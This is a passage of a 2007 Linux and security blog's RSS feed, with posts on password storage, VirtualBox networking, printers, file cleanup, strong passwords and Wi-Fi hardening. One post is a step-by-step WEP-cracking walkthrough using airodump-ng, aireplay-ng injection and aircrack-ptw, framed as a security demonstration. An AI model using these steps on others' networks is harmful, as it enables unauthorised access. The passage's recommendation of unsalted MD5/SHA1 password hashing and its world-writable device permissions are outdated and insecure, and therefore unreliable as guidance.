plain text, which brings security problems, as we will see next.&lt;br /&gt;Database administrators should NOT have access to the passwords. Also, if an attacker gains access to the database, he'll get a very easy way to get user's passwords.&lt;br /&gt;Besides, depending on the database configuration, it is possible that when we query &lt;span style="font-weight:bold;"&gt;"SELECT * FROM USERS WHERE USER='my_user' AND PASSWORD='my_password';"&lt;/span&gt;, the password is case insensitive. This facilitates the attackers to test different passwords because the case (upper and lower) is not being validated.&lt;br /&gt;Sometimes the developers encrypt the passwords using some encryption algorithm. Care must be taken for the following reasons:&lt;br /&gt;- In general these algorithms are bidirectional, which means that if we have the encryption key, we can get the original password from the ciphered text.&lt;br /&gt;- Good algorithms are well known and checked by the community of developers and mathematicians. You must not trust those who offer 'magic' formulas or do not want to make the algorithm public.&lt;br /&gt;Solution:&lt;br /&gt;What we must do is to hash the password (e.g. using SHA, SHA1, SHA2, MD5, etc) to obtain a scrambled code from which the original text cannot be obtained. This must be done each time the user supplies a password, be it when logging in, or when the user modifies his password. Remember to store the result of hashing the password supplied by the user in the database.&lt;br /&gt;When we look for the user, the SQL query would look like this: &lt;span style="font-weight:bold;"&gt;"SELECT * FROM USERS WHERE USER='my_user' AND PASSWORD='5eb942810a75ebc850972a89285d570d484c89c4';"&lt;/span&gt;.&lt;br /&gt;Note: before, the user could ask the administrators for the passwords if he forgot it, now, you must implement a password blanking routine for these cases.&lt;br /&gt;Hope this helps.&lt;br /&gt;&lt;br /&gt;Cheers!&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.tuxero.com/2007/09/cmo-almacenar-passwords-en-una-base-de.html"&gt;Versión en español&lt;/a&gt;&lt;br /&gt;&lt;div class="tag_list"&gt;Technorati tags: &lt;span&gt;&lt;a href="http://technorati.com/tag/database" rel="tag"&gt;database&lt;/a&gt; &lt;a href="http://technorati.com/tag/security" rel="tag"&gt;security&lt;/a&gt; &lt;a href="http://technorati.com/tag/sql" rel="tag"&gt;sql&lt;/a&gt; &lt;a href="http://technorati.com/tag/passwords" rel="tag"&gt;passwords&lt;/a&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4231410113405179901-4416264446588403419?l=en.tuxero.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/TuxeroEn/~3/RN6jMTM22Qs/how-to-store-passwords-in-database.html</link><author>noreply@blogger.com (Sebastián Stucke)</author><thr:total>0</thr:total><feedburner:origLink>http://en.tuxero.com/2007/09/how-to-store-passwords-in-database.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4231410113405179901.post-8902280235097211558</guid><pubDate>Tue, 18 Sep 2007 14:33:00 +0000</pubDate><atom:updated>2007-10-14T10:36:55.744-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Virtualization</category><title>Virtual Box 1.5 networking in Ubuntu Feisty</title><description>As I published in my previous &lt;a href="http://en.tuxero.com/2007/09/virtual-box-150-released.html"&gt;post&lt;/a&gt;, I installed Virtual Box 1.5.&lt;br /&gt;Now that I am using it, I found a couple of problems. First, I wanted to copy the virtual disks (VDI), and to my surprise, to copy the files just won't do the trick. We must use the disks cloning tool, as in the following example:&lt;br /&gt;&lt;blockquote&gt;VBoxManage clonevdi source.vdi destination.vdi&lt;/blockquote&gt;&lt;br /&gt;The next problem I had is that the network didn't work in 'Host Interface'. After looking at the help, and a few rounds with google, ubuntuforums and etcetera, I found a way to make it work. Here's a mini howto.&lt;br /&gt;First we install necessary packages:&lt;br /&gt;&lt;blockquote&gt;sudo apt-get install bridge-utils&lt;br /&gt;sudo apt-get install uml-utilities&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Then we must define network interfaces. We edit the interfaces file:&lt;br /&gt;&lt;blockquote&gt;sudo gedit /etc/network/interfaces &lt;/blockquote&gt;&lt;br /&gt;We add the necessary interfaces (replacing 'user' for the user that will use the virtual machines, and obviously a correct IP):&lt;br /&gt;&lt;blockquote&gt;auto br0&lt;br /&gt;iface br0 inet dhcp&lt;br /&gt;    bridge_ports eth0 br0&lt;br /&gt;&lt;br /&gt;auto tap0&lt;br /&gt;iface tap0 inet manual&lt;br /&gt;    up ifconfig $IFACE 192.168.0.150 up&lt;br /&gt;    down ifconfig $IFACE down&lt;br /&gt;    tunctl_user user&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;We restart the network:&lt;br /&gt;&lt;blockquote&gt;sudo /etc/init.d/networking restart&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;We add the user to the uml-net group:&lt;br /&gt;&lt;blockquote&gt;sudo gpasswd -a user uml-net&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;According to the help, this shoud work, but no. I found that for this to work we must execute:&lt;br /&gt;&lt;blockquote&gt;sudo chmod 0666 /dev/net/tun &lt;br /&gt;sudo chmod 0666 /dev/vboxdrv &lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;After this, we may set 'Host Interface', and in the interface name we enter 'tap0'.&lt;br /&gt;&lt;br /&gt;And that's it.&lt;br /&gt;&lt;br /&gt;Cheers!&lt;br /&gt;&lt;a href="http://www.tuxero.com/2007/09/virtual-box-15-networking-en-ubuntu.html"&gt;Versión en español&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="tag_list"&gt;Technorati tags: &lt;span&gt;&lt;a href="http://technorati.com/tag/linux" rel="tag"&gt;linux&lt;/a&gt; &lt;a href="http://technorati.com/tag/ubuntu" rel="tag"&gt;ubuntu&lt;/a&gt; &lt;a href="http://technorati.com/tag/virtual+box" rel="tag"&gt;virtual box&lt;/a&gt; &lt;a href="http://technorati.com/tag/networking" rel="tag"&gt;networking&lt;/a&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4231410113405179901-8902280235097211558?l=en.tuxero.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/TuxeroEn/~3/H1wCV6F9rHE/virtual-box-15-networking-in-ubuntu.html</link><author>noreply@blogger.com (Sebastián Stucke)</author><thr:total>0</thr:total><feedburner:origLink>http://en.tuxero.com/2007/09/virtual-box-15-networking-in-ubuntu.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4231410113405179901.post-6973201226750755010</guid><pubDate>Mon, 17 Sep 2007 13:25:00 +0000</pubDate><atom:updated>2007-09-17T10:29:57.835-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Ubuntu</category><title>HP Laserjet 1018 in Ubuntu Feisty</title><description>I recently had to set up a HP Laserjet 1018 printer in Ubuntu Feisty.&lt;br /&gt;Simple as it looks, it is not.&lt;br /&gt;The printer gets added correctly, and when I try to print a test page, the process goes without errors, except: it does not print!&lt;br /&gt;This seems bad enough, because, if it cannot print, at least it should notify the user.&lt;br /&gt;Searching, I found a way to make it work &lt;a href="https://wiki.ubuntu.com/HardwareSupportComponentsPrintersHp"&gt;here&lt;/a&gt;. &lt;br /&gt;There it says we must download and compile the drivers from &lt;a href="http://foo2zjs.rkkda.com/"&gt;here&lt;/a&gt;. &lt;br /&gt;Following these steps I was able to install the printer correctly, but nevertheless, it was a rather complex process.&lt;br /&gt;Cheers!&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.tuxero.com/2007/09/hp-laserjet-1018-en-ubuntu-feisty.html"&gt;Versión en español&lt;/a&gt;&lt;div class="tag_list"&gt;Technorati tags: &lt;span&gt;&lt;a href="http://technorati.com/tag/ubuntu" rel="tag"&gt;ubuntu&lt;/a&gt; &lt;a href="http://technorati.com/tag/hp+1018" rel="tag"&gt;hp 1018&lt;/a&gt; &lt;a href="http://technorati.com/tag/linux" rel="tag"&gt;linux&lt;/a&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4231410113405179901-6973201226750755010?l=en.tuxero.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/TuxeroEn/~3/AZNLBor5MPA/hp-laserjet-1018-in-ubuntu-feisty.html</link><author>noreply@blogger.com (Sebastián Stucke)</author><thr:total>0</thr:total><feedburner:origLink>http://en.tuxero.com/2007/09/hp-laserjet-1018-in-ubuntu-feisty.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4231410113405179901.post-4417310293311621633</guid><pubDate>Wed, 05 Sep 2007 19:02:00 +0000</pubDate><atom:updated>2007-09-17T10:29:52.714-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Virtualization</category><title>Virtual Box 1.5.0 released</title><description>Innotek's people amazed me with the new version of Virtual Box.&lt;br /&gt;Virtual Box is an open source virtualization system (free and libre) that allows us to have virtual machines on a host operating system.&lt;br /&gt;I downloaded and installed it in a matter of minutes (I use ubuntu). The installation was a breeze. To install a virtual machine was truly simple.&lt;br /&gt;What amazed me the most was the 'Seamless mode' that allows to have host operating system windows mixed with the guest operating system windows.&lt;br /&gt;I am lover of virtualization, due the great benefits that provides us. This is great news for me, since other solutions such as VM Ware Server (free, not libre) are not always easy to install and implement.&lt;br /&gt;&lt;br /&gt;I saw it at &lt;a href="http://www.genbeta.com/2007/09/04-virtual-box-15-con-seamless-integrando-ventanas-de-otros-so-en-tu-escritorio"&gt;genbeta&lt;/a&gt;. &lt;br /&gt;You can download it at &lt;a href="http://www.virtualbox.org/wiki/Downloads"&gt;virtual box&lt;/a&gt;'s site.: &lt;br /&gt;&lt;br /&gt;Cheers!&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.tuxero.com/2007/09/virtual-box-150-liberado.html"&gt;Versión en español&lt;/a&gt;&lt;br /&gt;&lt;div class="tag_list"&gt;Technorati tags: &lt;span&gt;&lt;a href="http://technorati.com/tag/virtualization" rel="tag"&gt;virtualization&lt;/a&gt; &lt;a href="http://technorati.com/tag/virtual+box" rel="tag"&gt;virtual box&lt;/a&gt; &lt;a href="http://technorati.com/tag/linux" rel="tag"&gt;linux&lt;/a&gt; &lt;a href="http://technorati.com/tag/ubuntu" rel="tag"&gt;ubuntu&lt;/a&gt; &lt;a href="http://technorati.com/tag/windows" rel="tag"&gt;windows&lt;/a&gt; &lt;a href="http://technorati.com/tag/vmware" rel="tag"&gt;vmware&lt;/a&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4231410113405179901-4417310293311621633?l=en.tuxero.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/TuxeroEn/~3/7-WYRHphO8s/virtual-box-150-released.html</link><author>noreply@blogger.com (Sebastián Stucke)</author><thr:total>0</thr:total><feedburner:origLink>http://en.tuxero.com/2007/09/virtual-box-150-released.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4231410113405179901.post-3166384149973991040</guid><pubDate>Mon, 03 Sep 2007 16:24:00 +0000</pubDate><atom:updated>2007-09-04T09:39:21.361-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Ubuntu</category><title>How to delete useless Windows Files in Ubuntu Linux</title><description>After using Windows for a long time, my music and photos folder where filled with 'desktop.ini' and 'Thumbs.db' files. For a while I've been only using Ubuntu Linux, so I decided to delete those files.&lt;br /&gt;To do it, you may use this command (have in mind that this goes throughout every sub folder in the selected path, so don't do it on the root folder):&lt;br /&gt;&lt;blockquote&gt;find /my_path -type f -name "desktop.ini" -exec rm -f {} \;&lt;br /&gt;find /my_path -type f -name "Thumbs.db" -exec rm -f {} \;&lt;/blockquote&gt;We may also use this command to delete album covers in our music folders:&lt;br /&gt;&lt;blockquote&gt;find /music_path -type f -name "*.jpg" -exec rm -f {} \;&lt;/blockquote&gt;As you see, this can be used to delete any file (or type of file) recursively in folders. You may use it to delete other files, as long as you take care not to delete files you need or want.&lt;br /&gt;If you want to examine the files that are going to be deleted before doing it, you should execute the same command, changing 'rm' for 'ls', like this:&lt;br /&gt;&lt;blockquote&gt;find /my_path -type f -name "desktop.ini" -exec ls -f {} \;&lt;/blockquote&gt;In this way you may control the list of files to delete.&lt;br /&gt;I hope this helps.&lt;br /&gt;&lt;br /&gt;Cheers!&lt;br /&gt;&lt;br /&gt;Technorati tags: &lt;a href="http://technorati.com/tag/windows" rel="tag"&gt;Windows&lt;/a&gt;, &lt;a href="http://technorati.com/tag/linux" rel="tag"&gt;Linux&lt;/a&gt;, &lt;a href="http://technorati.com/tag/ubuntu" rel="tag"&gt;Ubuntu&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.tuxero.com/2007/09/cmo-borrar-archivos-intiles-de-windows.html"&gt;Versión en español&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4231410113405179901-3166384149973991040?l=en.tuxero.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/TuxeroEn/~3/o8ynbetUca8/how-to-delete-useless-windows-files-in.html</link><author>noreply@blogger.com (Sebastián Stucke)</author><thr:total>6</thr:total><feedburner:origLink>http://en.tuxero.com/2007/09/how-to-delete-useless-windows-files-in.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4231410113405179901.post-2539814107302695096</guid><pubDate>Thu, 30 Aug 2007 04:36:00 +0000</pubDate><atom:updated>2007-09-04T16:55:45.024-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Security</category><title>How to make strong passwords</title><description>Our passwords can be guessed or obtained by dictionary attacks. To protect our private data and resources, we must have passwords that cannot be guessed and that don't appear in dictionaries.&lt;br /&gt;&lt;br /&gt;Next, a few recommendations to make our passwords more secure:&lt;br /&gt;You must avoid using dates, names and dictionary words.&lt;br /&gt;You should use letters (lower case and upper case), mixed with numbers and symbols.&lt;br /&gt;You should change your passwords periodically.&lt;br /&gt;&lt;br /&gt;Given the difficulty that may involve remembering a password like 'ñF(fh3#"$j9', you can use the following technique to make the labor less hard:&lt;br /&gt;Think a phrase (five or more words) that means something to you. In this example I'll use 'To be or not to be'. Then take a number (three or four digits) that you can remember (I'll use 1234). No with all this, you take the first letter of each word (one upper case, one lower case) and you mix it with the digits of the number you chose. If you always use the same keyboard layout (or if you can remember it by heart), you may convert numbers into symbols by pressing the 'shift' key.&lt;br /&gt;Following this example , my keyword would be:&lt;br /&gt;T1b"O3n$Tb&lt;br /&gt;&lt;br /&gt;This is just a base, you may alter this idea, for instance you may begin with numbers, or two letters for each number, or use the second letter of each word, etc. Use your imagination!&lt;br /&gt;&lt;br /&gt;You now have the basis for having strong passwords easy to remember.&lt;br /&gt;&lt;br /&gt;Cheers!&lt;br /&gt;Technorati tags: &lt;a href="http://technorati.com/tag/security" rel="tag"&gt;Security&lt;/a&gt;, &lt;a href="http://technorati.com/tag/passwords" rel="tag"&gt;Passwords&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.tuxero.com/2007/08/cmo-hacer-contraseas-seguras.html"&gt;Versión en español&lt;/a&gt;&lt;br /&gt;&lt;div class="tag_list"&gt;Technorati tags: &lt;span&gt;&lt;a href="http://technorati.com/tag/security" rel="tag"&gt;security&lt;/a&gt; &lt;a href="http://technorati.com/tag/passwords" rel="tag"&gt;passwords&lt;/a&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4231410113405179901-2539814107302695096?l=en.tuxero.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/TuxeroEn/~3/0p1h047HDCQ/how-to-make-strong-passwords.html</link><author>noreply@blogger.com (Sebastián Stucke)</author><thr:total>0</thr:total><feedburner:origLink>http://en.tuxero.com/2007/08/how-to-make-strong-passwords.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4231410113405179901.post-2864871627970369506</guid><pubDate>Tue, 28 Aug 2007 19:03:00 +0000</pubDate><atom:updated>2007-09-04T16:55:24.640-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Security</category><title>How to make a Wireless network more secure</title><description>&lt;p&gt;I decided to gather a series of recommendations to make WiFi networks more secure.&lt;/p&gt;&lt;p&gt;Please have in mind that every system is vulnerable, it is only about reducing the risk of being vulnerated.&lt;br /&gt;&lt;/p&gt;&lt;p&gt;I divide recommendations in two parts: AP (Access Point) and the workstation.&lt;br /&gt;&lt;/p&gt; &lt;p&gt;&lt;b&gt;At the AP&lt;/b&gt;&lt;/p&gt; &lt;ul&gt;&lt;li&gt;Change the SSID by default. It's not good to have those from factory (ej: Linksys, 3COM, etc.)&lt;/li&gt;&lt;li&gt;Change AP's default password. It is relatively easy to find out the AP's model, and from there to know the default admin password.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Deactivate SSID broadcasting. This doesn't add much security, but discourages '&lt;span style="font-style: italic;"&gt;casual hacker&lt;/span&gt;'.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Use WPA or WPA2. Don't let the network without security. WEP is vulnerable (see my other post &lt;a href="http://en.tuxero.com/2007/08/howto-crack-wep-sony-vaio.html"&gt;http://en.tuxero.com/2007/08/howto-crack-wep-sony-vaio.html&lt;/a&gt;), however if WPA or WPA2 are not available, WEP is better than nothing.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Filter by MAC Address. Even if a MAC address can be changed, this is more complicated for common people.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Deactivate DHCP. Unless it is not possible, use static IP addresses.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Limit the maximum number of IPs in the DHCP. This would limit the quantity of devices connected (however more devices can be added with static IPs).&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Turn the AP off when not in use. This is not always possible. For home networks, this option is good, as long as you don't let your PC turned on for accessing it from the internet.&lt;/li&gt;&lt;li&gt;Change the passwords often. With time, passwords can be obtained. To change them regularly it is a good practice.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Limit the AP power. This is quite effective. It is always good to lower the power at the minimum (verifying that the farthest device can connect correctly). This lowers the chances of connection from distant devices (eg: someone in the street).&lt;/li&gt;&lt;li&gt;Choose AP's location wisely. It is good to put the AP in the center of the house, away from windows and exterior walls (see preceding point).&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Use secure passwords. It is good to use passwords that mix letters, numbers and signs. If possible, use entirely random hexadecimal passwords.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Disable AP's remote administration. This impedes someone from outside the network from accessing the AP.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Activate Firewall at the AP.&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;&lt;b&gt;At the workstation&lt;br /&gt;&lt;/b&gt;&lt;/p&gt; &lt;ul&gt;&lt;li&gt;Verify who installed the AP. There are APs planted to capture network traffic. You should check it is a legitimate AP.&lt;/li&gt;&lt;li&gt;While surfing the net, do not enter passwords, or sensitive information in pages not marked as secure. Before entering credit card numbers, bank or email passwords, check that the site address begins with 'https://'.&lt;/li&gt;&lt;li&gt;Do not share public folders. This is a very common mistake: to have shared folders while connecting to a (public) wireless network.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Verify you have an active firewall. When connecting to public wifi networks, you are exposed to attack from other devices inside the network.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Shutdown the wireless card when not in use. Besides the obvious energy savings, an attacker could create an 'ad-hoc' network with the active NIC.&lt;/li&gt;&lt;li&gt;Use a VPN. If you have a VPN (generally available in corporate environments), this makes the connection more secure.&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Always remember that we are 'just making it more difficult' to hackers.  We should avoid making it easy ;-)&lt;br /&gt;&lt;/p&gt; &lt;p&gt;You can check these links too:&lt;/p&gt; &lt;ul&gt;&lt;li&gt;&lt;a href="http://www.pdaexpertos.com/Tutoriales/Comunicaciones/Seguridad_en_redes_inalambricas_WiFi.shtml" mce_href="http://www.pdaexpertos.com/Tutoriales/Comunicaciones/Seguridad_en_redes_inalambricas_WiFi.shtml" title="http://www.pdaexpertos.com/Tutoriales/Comunicaciones/Seguridad_en_redes_inalambricas_WiFi.shtml"&gt;http://www.pdaexpertos.com/Tutoriales/Comunicaciones/Seguridad_en_redes_inalambricas_WiFi.shtml&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://sebastianstucke.wordpress.com/wp-admin/post.php#%20http://compnetworking.about.com/od/wirelesssecurity/tp/wifisecurity.htm" mce_href="http://sebastianstucke.wordpress.com/wp-admin/post.php#%20http://compnetworking.about.com/od/wirelesssecurity/tp/wifisecurity.htm" title="# http://compnetworking.about.com/od/wirelesssecurity/tp/wifisecurity.htm"&gt;http://compnetworking.about.com/od/wirelesssecurity/tp/wifisecurity.htm&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.pcmag.com/article2/0,4149,844020,00.asp" mce_href="http://www.pcmag.com/article2/0,4149,844020,00.asp" title="http://www.pcmag.com/article2/0,4149,844020,00.asp"&gt;http://www.pcmag.com/article2/0,4149,844020,00.asp&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://sebastianstucke.wordpress.com/wp-admin/post.php#%20http://www.pcworld.com/article/id,130330/article.html" mce_href="http://sebastianstucke.wordpress.com/wp-admin/post.php#%20http://www.pcworld.com/article/id,130330/article.html" title="# http://www.pcworld.com/article/id,130330/article.html"&gt;http://www.pcworld.com/article/id,130330/article.html&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.practicallynetworked.com/support/wireless_secure.htm" mce_href="http://www.practicallynetworked.com/support/wireless_secure.htm" title="http://www.practicallynetworked.com/support/wireless_secure.htm"&gt;http://www.practicallynetworked.com/support/wireless_secure.htm&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt; &lt;br /&gt;&lt;br /&gt;&lt;p&gt;Cheers!&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.tuxero.com/2007/08/cmo-hacer-una-red-wifi-ms-segura.html"&gt;Versión en español&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="tag_list"&gt;Technorati tags: &lt;span&gt;&lt;a href="http://technorati.com/tag/wifi" rel="tag"&gt;wifi&lt;/a&gt; &lt;a href="http://technorati.com/tag/wireless" rel="tag"&gt;wireless&lt;/a&gt; &lt;a href="http://technorati.com/tag/security" rel="tag"&gt;security&lt;/a&gt; &lt;a href="http://technorati.com/tag/wep" rel="tag"&gt;wep&lt;/a&gt; &lt;a href="http://technorati.com/tag/wpa" rel="tag"&gt;wpa&lt;/a&gt; &lt;a href="http://technorati.com/tag/wpa2" rel="tag"&gt;wpa2&lt;/a&gt; &lt;a href="http://technorati.com/tag/crack" rel="tag"&gt;crack&lt;/a&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4231410113405179901-2864871627970369506?l=en.tuxero.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/TuxeroEn/~3/aq6fUMMr_Jw/how-to-make-wireless-network-more.html</link><author>noreply@blogger.com (Sebastián Stucke)</author><thr:total>3</thr:total><feedburner:origLink>http://en.tuxero.com/2007/08/how-to-make-wireless-network-more.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4231410113405179901.post-7176663152681939114</guid><pubDate>Tue, 28 Aug 2007 18:40:00 +0000</pubDate><atom:updated>2008-01-29T17:56:54.052-02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Security</category><title>HOWTO Crack WEP - Sony Vaio</title><description>&lt;p&gt;Based on a professional need, I had to demonstrate that WEP can be cracked. Even though I 'knew' this could be done, I never actually did it myself.&lt;/p&gt;&lt;p&gt;Note: This is only for researching, learning, and security checking purposes. This shouldn't be used to crack networks owned by other people. To attack and to vulnerate networks (or other resources) is bad, and illegal.&lt;/p&gt;&lt;p&gt;Doing some research, I found that my Sony Vaio VGN N350FE wireless card (an Intel 3945ABG), didn't allow certain things from linux, among them one necessary to demonstrate this vulnerability.&lt;/p&gt;&lt;p&gt;If you read my previous posts, you'll see that this is not the first problem I find with hardware.&lt;/p&gt;&lt;p&gt;Also it isn't the first I find a solution for :-)&lt;br /&gt;&lt;/p&gt;&lt;p&gt;I found a howto at &lt;a href="http://foro.seguridadwireless.net/index.php?topic=3227.0http://foro.seguridadwireless.net/index.php?topic=3227.0" mce_href="http://foro.seguridadwireless.net/index.php?topic=3227.0http://foro.seguridadwireless.net/index.php?topic=3227.0" title="http://foro.seguridadwireless.net/index.php?topic=3227.0" target="_blank"&gt;http://foro.seguridadwireless.net/index.php?topic=3227.0&lt;/a&gt; that I used as a base.&lt;/p&gt; &lt;p&gt;Next, the steps I followed to crack WEP.&lt;br /&gt;&lt;/p&gt;&lt;p&gt;We need a linux distribution availabe at &lt;a href="http://www.comprawifi.net/public/wifiway/0.6/wifiway-0.6.iso" mce_href="http://www.comprawifi.net/public/wifiway/0.6/wifiway-0.6.iso" title="http://www.comprawifi.net/public/wifiway/0.6/wifiway-0.6.iso" target="_blank"&gt;http://www.comprawifi.net/public/wifiway/0.6/wifiway-0.6.iso&lt;/a&gt;. We download the CD image and we burn it.&lt;/p&gt; &lt;p&gt;We boot the notebook with WifiWay (it must be able to boot from optical drives).&lt;/p&gt; &lt;p&gt;Once started, we open the X:&lt;/p&gt; &lt;blockquote&gt;&lt;p&gt;startx&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;We set the channel of the AP (Access Point) in the NIC.&lt;/p&gt; &lt;blockquote&gt;&lt;p&gt;echo 'CAPTURE_CHANNEL' &gt; /sys/class/net/wifi0/device/channel&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;We get the BSSID, the channel and the ESSID.&lt;/p&gt; &lt;blockquote&gt;&lt;p&gt;airodump-ng rtap0&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;We finish the execution with CONTROL-C, and we set the BSSID (an HEX number with 6 positions) in the NIC.&lt;/p&gt; &lt;blockquote&gt;&lt;p&gt;echo 'AP_BSSID' &gt; /sys/class/net/wifi0/device/bssid&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;Once we do this, we start capturing.&lt;br /&gt;&lt;/p&gt; &lt;blockquote&gt;&lt;p&gt;airodump-ng -c CAPTURE_CHANNEL -w CAPTURE_FILE rtap0&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;We open a new window and we set speed at 2 mbps:&lt;/p&gt; &lt;blockquote&gt;&lt;p&gt;echo '2' &gt; /sys/class/net/wifi0/device/rate&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;We activate the nic.&lt;/p&gt; &lt;blockquote&gt;&lt;p&gt;ifconfig wifi0 up&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;We look for our MAC address, it's the first 12 numbers stated in HWaddr&lt;/p&gt; &lt;blockquote&gt;&lt;p&gt;ifconfig&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;We initiate an association with the AP.&lt;/p&gt; &lt;blockquote&gt;&lt;p&gt;aireplay-ng -1 0 -a AP_BSSID -h MAC_ADDRESS_WIFI -e AP_ESSID wifi0&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;We open another terminal and we start injecting traffic:.&lt;/p&gt; &lt;blockquote&gt;&lt;p&gt;aireplay-ng -3 -b AP_BSSID -e AP_ESSID -h MAC_ADDRESS_WIFI wifi0&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;This should incremente the number of data in the capture window (it takes a while before it starts incrementing).&lt;br /&gt;&lt;/p&gt;&lt;p&gt;When we have over 100.000, we may extract the key by executing:&lt;/p&gt; &lt;blockquote&gt;&lt;p&gt;aircrack-ptw CAPTURE_FILE.cap&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;This should give us the key in hex format.&lt;br /&gt;&lt;/p&gt;&lt;p&gt;I hope this is useful to you.&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Technorati tags: &lt;a href="http://technorati.com/tag/vaio" rel="tag"&gt;Vaio&lt;/a&gt;, &lt;a href="http://technorati.com/tag/sony+vaio" rel="tag"&gt;Sony Vaio&lt;/a&gt;, &lt;a href="http://technorati.com/tag/wep" rel="tag"&gt;WEP&lt;/a&gt;, &lt;a href="http://technorati.com/tag/wifi" rel="tag"&gt;WiFi&lt;/a&gt;, &lt;a href="http://technorati.com/tag/wireless" rel="tag"&gt;Wireless&lt;/a&gt;, &lt;a href="http://technorati.com/tag/security" rel="tag"&gt;Security&lt;/a&gt;, &lt;a href="http://technorati.com/tag/crack" rel="tag"&gt;Crack&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Cheers!&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.tuxero.com/2007/08/howto-crack-wep-sony-vaio.html"&gt;Versión en español&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4231410113405179901-7176663152681939114?l=en.tuxero.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/TuxeroEn/~3/Mv3Uf48cfJY/howto-crack-wep-sony-vaio.html</link><author>noreply@blogger.com (Sebastián Stucke)</author><thr:total>27</thr:total><feedburner:origLink>http://en.tuxero.com/2007/08/howto-crack-wep-sony-vaio.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4231410113405179901.post-6821158640668957556</guid><pubDate>Tue, 28 Aug 2007 18:25:00 